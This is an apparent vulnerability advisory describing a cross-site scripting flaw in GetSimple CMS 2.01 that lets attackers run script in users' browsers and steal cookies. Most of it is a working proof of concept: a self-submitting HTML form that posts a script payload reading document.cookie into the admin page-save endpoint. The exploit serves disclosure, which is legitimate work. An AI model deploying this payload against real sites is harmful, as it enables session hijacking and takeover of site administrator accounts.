source: https://www.securityfocus.com/bid/43593/info
GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GetSimple CMS 2.01is vulnerable; prior versions may also be affected.<form action="http://host/admin/changedata.php" method="post" name="main"><inputtype="hidden" name="post-title" value='page title"><script>alert(document.cookie)</script>'/><inputtype="hidden" name="post-id" value="test"/><inputtype="hidden" name="post-metak" value=""/><inputtype="hidden" name="post-metad" value=""/><inputtype="hidden" name="post-parent" value=""/><inputtype="hidden" name="post-template" value="template.php"/><inputtype="hidden" name="post-menu" value="test"/><inputtype="hidden" name="post-menu-order" value=""/><inputtype="hidden" name="post-content" value="page html"/><inputtype="hidden" name="existing-url" value="test"/><inputtype="hidden" name="submitted" value="Save Updates"/></form><script> document.main.submit();</script>